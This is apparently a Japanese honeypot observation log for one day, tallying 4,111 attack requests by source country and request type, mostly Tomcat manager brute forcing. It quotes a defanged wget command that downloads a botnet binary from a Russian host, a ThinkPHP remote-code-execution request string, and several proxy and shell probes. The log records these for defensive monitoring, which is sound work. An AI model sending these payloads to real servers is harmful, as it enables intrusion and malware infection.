WOWHoneypot観察(200日目)
2019/09/02(水)
トータルは4111件でした。
ハンティングログは以下です。
195.24.207[.]169 wget+hxp[:]//ardp[.]hldns[.]ru/loligang.mpsl |
IPのロケーション別の件数は以下です。
アルゼンチン | 4002 |
中国 | 33 |
アメリカ | 11 |
ブラジル | 10 |
アイスランド | 5 |
インド | 4 |
フランス | 4 |
パキスタン | 4 |
タイ | 4 |
ギリシャ | 3 |
メキシコ | 3 |
南アフリカ | 2 |
ウクライナ | 2 |
バングラデシュ | 2 |
イラン | 2 |
イタリア | 2 |
インドネシア | 2 |
セルビア1 | |
ハンガリー1 | |
ルーマニア1 | |
ロシア1 | |
トルコ1 | |
エストニア1 | |
カンボジア1 | |
コンゴ1 | |
モロッコ1 | |
ブルガリア1 | |
カメルーン1 | |
ラトビア1 | |
ポーランド1 | |
リビア1 | |
オーストラリア1 | |
シンガポール1 |
件数 | 概要 | リクエスト |
---|---|---|
4004 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
81 | アクセス | GET / |
2 | Servletの調査? | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
2 | phpMyAdminの調査 | GET /admin-scripts.asp |
2 | hinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
2 | hinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | POST /tmUnblock.cgi | |
1 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
1 | クローリング | HEAD /robots.txt |
1 | 不正中継の調査 | GET hxxp[:]//www.ip.cn/ |
1 | 不正中継の調査 | GET hxxp[:]//www.123cha.com/ |
1 | サイト構成の調査 | GET /sitemap.xml |
1 | 不明 | GET /shell?busybox |
1 | クローリング | GET /robots.txt |
1 | 不明 | GET /manager/top.asp |
1 | 不明 | GET /js/preload/example.txt |
1 | アクセス | GET /favicon.ico |
1 | CGI版PHPの調査? | GET /cgi-bin |
1 | SL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
1 | 不正中継の試みCONNECT www.baidu.com:443 | |
1 | 不正中継の試み | CONNECT cn.bing.com:443 |